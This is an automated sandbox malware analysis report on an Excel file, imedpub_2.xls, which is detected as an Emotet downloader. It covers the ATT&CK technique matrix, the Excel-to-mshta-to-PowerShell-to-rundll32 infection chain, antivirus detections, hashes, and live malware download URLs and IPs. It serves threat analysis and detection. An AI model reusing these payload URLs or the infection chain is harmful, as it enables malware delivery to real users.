                            Source: Yara matchFile source: 0000000A.00000002.523320512.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578029021.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\ProgramData\QWER.dll, type: DROPPED
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 21 Scripting | 1 Windows Service | 1 Windows Service | 1 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 5 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 38 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 11 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 114 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | 1 Service Execution | Network Logon Script | Network Logon Script | 2 Masquerading | LSA Secrets | 1 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | 1 PowerShell | Rc.common | Rc.common | 1 Modify Registry | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Rundll32 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Behavior graph (ID: 562406, Sample: imedpub_2.xls, Start date: 28/01/2022, Architecture: WINDOWS, Score: 100). Process chain: EXCEL.EXE started cmd.exe, which started mshta.exe (contacted 91.240.118.168), which started powershell.exe (contacted dtmconsulting.ca at 162.241.211.118 and praachichemfood.com at 103.138.189.128; dropped C:\ProgramData\QWER.dll, PE32; signature: Powershell drops PE file), which started cmd.exe, which started two rundll32.exe processes. One of these started a further chain of rundll32.exe processes, the first of which dropped C:\Windows\SysWOW64\...\pagi.wrr (copy), PE32 (signature: Hides that the sample has been downloaded from the Internet (zone.identifier)).

Source | Detection | Scanner | Label
imedpub_2.xls | 28% | ReversingLabs | Document-Excel.Trojan.Emotet
Source | Detection | Scanner | Label
C:\ProgramData\QWER.dll | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
17.2.rundll32.exe.710000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.3150000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.rundll32.exe.2c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.2f10000.12.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.aa0000.6.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.370000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.140000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.300000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.27b0000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.310000.3.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.140000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.410000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.25f0000.10.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.7f0000.4.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.ae0000.7.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.2f60000.13.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.2670000.11.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.4a0000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.28f0000.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.9d0000.4.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.4c0000.4.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.2fd0000.15.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.330000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.180000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.820000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.3e0000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.2620000.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.rundll32.exe.760000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.rundll32.exe.260000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.25f0000.10.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.2f50000.12.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.200000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.2.rundll32.exe.240000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.320000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.c40000.8.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.rundll32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.a70000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.2f90000.14.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.ad0000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.2480000.8.unpack | 100% | Avira | HEUR/AGEN.1145233
14.2.rundll32.exe.1b0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
9.2.rundll32.exe.290000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.790000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.2870000.10.unpack | 100% | Avira | HEUR/AGEN.1145233
11.2.rundll32.exe.200000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.29f0000.12.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.rundll32.exe.350000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.2580000.9.unpack | 100% | Avira | HEUR/AGEN.1145233
17.2.rundll32.exe.7c0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.ab0000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.a80000.6.unpack | 100% | Avira | HEUR/AGEN.1145233
12.2.rundll32.exe.2fc0000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.25c0000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.rundll32.exe.b40000.8.unpack | 100% | Avira | HEUR/AGEN.1145233
15.2.rundll32.exe.220000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
10.2.rundll32.exe.4f0000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.rundll32.exe.420000.5.unpack | 100% | Avira | HEUR/AGEN.1145233
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dtmconsulting.ca | 162.241.211.118 | true | false | | unknown
praachichemfood.com | 103.138.189.128 | true | false | | unknown
www.praachichemfood.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://dtmconsulting.ca/wp-includes/dkCFwyE/ | true | Avira URL Cloud: malware | unknown
http://praachichemfood.com/public_html/SWmteCWBUkA89/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/zqqw/zaas/fe.png | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/zqqw/zaas/fe.html | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://91.240.118.168/zqqw/zaas/fe.htmlmshtamshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://bakultante.com/tee5oeot/Q/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.praachichemfood.com/xmlrpc.php?rsdpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://onewaymedia.ro/wp-includes/k/powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://91.240.118.168/zqqw/zaas/fe.html.0mshta.exe, 00000004.00000002.441392938.00000000032FF000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://praachichemfood.compowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.shortcode.min.css?ver=5.9powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.vc.shortcodes.min.css?ver=5.9powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.htmlmshta.exe, 00000004.00000003.421019651.0000000001F85000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://91.240.118.168powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmptrue
                                              • URL Reputation: malware
                                              unknown
                                              http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://lodev7.com/wp-content/dpwjiJivrpgO1F2/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675478649.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.pngpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/font-awesome.min.css?ver=2.0.powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://91.240.118.168/zqqw/zaas/fe.htmlfunctionmshta.exe, 00000004.00000003.421233616.0000000001F8D000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562406
Start date: 28.01.2022
Start time: 21:03:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 46s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: imedpub_2.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@25/9@3/48
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 21.2% (good quality ratio 17.8%)
• Quality average: 65.2%
• Quality standard deviation: 33.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 50
• Number of non-executed functions: 197
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 2692 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 1940 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: imedpub_2.xls
Time      Type             Description
21:04:22  API Interceptor  55x Sleep call for process: mshta.exe modified
21:04:25  API Interceptor  440x Sleep call for process: powershell.exe modified
21:04:49  API Interceptor  88x Sleep call for process: rundll32.exe modified
                                                                                                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  ommegaonline.org.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Ommega Online Publishers.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP LLC_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP LLC.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Opast Publishing Group_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Opast Publishing Group.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  imedpub.com.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                  No context
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):548864
                                                                                                                                  Entropy (8bit):6.980518565537256
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvAyMwWd3DYr6i64/:OUBPSczbeeTnvQZDWA
                                                                                                                                  MD5:DC3651F090CC027069575CCE3F7B11C4
                                                                                                                                  SHA1:9513FDDD90160C21615F24A051CCECB26BB9EE5D
                                                                                                                                  SHA-256:9682B131292899C92EF867EB6DBE43FA3FB0916D7F470BF1BBE40B9A4A69729A
                                                                                                                                  SHA-512:1CB63DD9A694BCEF30F01457C0806B2D13782CC3E6210661111588F3A19E63BDBA231EAD6CC82495DD9A7232462598F6EBEBC8F801BE648099CC9F2D6315D09D
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):11027
                                                                                                                                  Entropy (8bit):6.187715019052575
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:aY9CkQSLcutiKMw/kx/TgCjOQRH3akr8c7cI/WAgaPJgij2Ij9dSS8i42Kb50:aYckKutitw/ggq8eWAnP+ri42N
                                                                                                                                  MD5:EC79EBD9247684CA6AED0631679B7225
                                                                                                                                  SHA1:10BC16397275BC56C513E173DB9F7A58711FAFB7
                                                                                                                                  SHA-256:04A7C11B6B3FD46B8C10A2F970A3456BAF275F99EF545C45B8A458DA78AECD83
                                                                                                                                  SHA-512:2FE9F6F17F6F58FD0C95FF76D6B80895C3237E84D6C7C144FCDFD7690B780D5F9462C0A77B32FBE1B8C5D9FD35A74FA58F95EC671BE5D761263611669DB26B32
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  IE Cache URL:http://91.240.118.168/zqqw/zaas/fe.html
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1536
                                                                                                                                  Entropy (8bit):1.1464700112623651
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):512
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3::
                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):28672
                                                                                                                                  Entropy (8bit):2.6611029621829974
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:RUFNjmg+HymsPck3hbdlylKsgqopeJBWhZFGkE+cMLm:Rs+HymsPck3hbdlylKsgqopeJBWhZFGJ
                                                                                                                                  MD5:5466502BF12D75D5AECAD7ADFAA7B292
                                                                                                                                  SHA1:9B3419DBC202E3EB30E3E161931B7E901533BFB4
                                                                                                                                  SHA-256:F1000CEA9C2D150929AB2FA833D0C3852FF7518A215F10A2DAA612527800C478
                                                                                                                                  SHA-512:CC5A9FD616561D088B8798547FB75A5C7302505847F73C1867EAA69DF6BECA195BC50D66B0E7EFF17C4AB2E5B0D3FE61DAEB14B78CA18404826C0C3B9A1BCB8F
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8016
                                                                                                                                  Entropy (8bit):3.580974733007209
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:chQCQMqKqvsqvJCwojz8hQCQMqKqvsEHyqvJCworBzKAYnH0UVX/lUV9A2:cWzojz8WnHnorBzKYUVXaA2
                                                                                                                                  MD5:0B79CF7DDEACFEE528CDA82A673274A1
                                                                                                                                  SHA1:22B72DFB6B7340BDF951442AD79C09C0BE116DF1
                                                                                                                                  SHA-256:463C2277420E4CB12AED5357E257DBB41FC03F1188F6695D188D04369783A542
                                                                                                                                  SHA-512:BB550AF949D7631F601FBB15AA1FAB3F558C28FA4B2A94BABA7496C3910E6AAFAAC443438553E08528D5A4A23FBEAE92B66142DC1BC9FF09E6F04717234F5A6D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 11:58:35 2022, Last Saved Time/Date: Thu Jan 27 13:02:02 2022, Security: 0
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):158208
                                                                                                                                  Entropy (8bit):7.176512065929886
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:Qs+Hyms0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIb4UgCEqM5mheHRAjNKnlGIzR:9+Hyms0k3hbdlylKsgqopeJBWhZFVE+h
                                                                                                                                  MD5:D3DD61166F5B818F87CCAA12F6148CB3
                                                                                                                                  SHA1:5EF2DEF5DAD29C53F64811FFAB09BD8EF50C0BAE
                                                                                                                                  SHA-256:E6D851663FB0D0C7B56F6522B751EFCAE34DC69A1AF4114C03FC94C832427332
                                                                                                                                  SHA-512:8327A085211044B78CB12676C6A0DA4FECF0ACBED073EB22F0F1358ABCE8B47DEDD287B4F72C026E18D4C02409B67665BA0C40653B44C5C28846746EC8E924A0
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub_2.xls, Author: John Lambert @JohnLaTwC
                                                                                                                                  • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub_2.xls, Author: Joe Security
                                                                                                                                  • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\imedpub_2.xls, Author: ditekSHen
                                                                                                                                  Reputation:unknown
                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):548864
                                                                                                                                  Entropy (8bit):6.980518565537256
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvAyMwWd3DYr6i64/:OUBPSczbeeTnvQZDWA
                                                                                                                                  MD5:DC3651F090CC027069575CCE3F7B11C4
                                                                                                                                  SHA1:9513FDDD90160C21615F24A051CCECB26BB9EE5D
                                                                                                                                  SHA-256:9682B131292899C92EF867EB6DBE43FA3FB0916D7F470BF1BBE40B9A4A69729A
                                                                                                                                  SHA-512:1CB63DD9A694BCEF30F01457C0806B2D13782CC3E6210661111588F3A19E63BDBA231EAD6CC82495DD9A7232462598F6EBEBC8F801BE648099CC9F2D6315D09D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 11:58:35 2022, Last Saved Time/Date: Thu Jan 27 13:02:02 2022, Security: 0
                                                                                                                                  Entropy (8bit):7.166678736422083
                                                                                                                                  TrID:
                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                  File name:imedpub_2.xls
                                                                                                                                  File size:158528
                                                                                                                                  MD5:9152f953f0fb28e90fc2cdaa4dc8c6ce
                                                                                                                                  SHA1:e82a389da3baa5a094df5ecc49ac23aa951466d8
                                                                                                                                  SHA256:131c6cbabbaa04e8953a7647ed6a2245a415ff9a2fdd63620bdb9cdc29c479d4
                                                                                                                                  SHA512:5faf89afcc57078369e01276a62237d7e7598d40c0bdbc7796fd9e287794e09e8010f0a8b9f9ae0a61a40686fd8f03ae467f1ac64f1fc72a64942686c2c53f5f
                                                                                                                                  SSDEEP:3072:zs+Hyms0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIb4UgCEqM5mheHRAjNKnlGIz/:o+Hyms0k3hbdlylKsgqopeJBWhZFVE+P
                                                                                                                                  Icon Hash:e4eea286a4b4bcb4
                                                                                                                                  Document Type:OLE
                                                                                                                                  Number of OLE Files:1
                                                                                                                                  Has Summary Info:True
                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                  Encrypted Document:False
                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                  Flash Objects Count:
                                                                                                                                  Contains VBA Macros:True
                                                                                                                                  Code Page:1251
                                                                                                                                  Author:xXx
                                                                                                                                  Last Saved By:xXx
                                                                                                                                  Create Time:2022-01-27 11:58:35
                                                                                                                                  Last Saved Time:2022-01-27 13:02:02
                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                  Security:0
                                                                                                                                  Document Code Page:1251
                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                  Company:
                                                                                                                                  Contains Dirty Links:False
                                                                                                                                  Shared Document:False
                                                                                                                                  Changed Hyperlinks:False
                                                                                                                                  Application Version:1048576
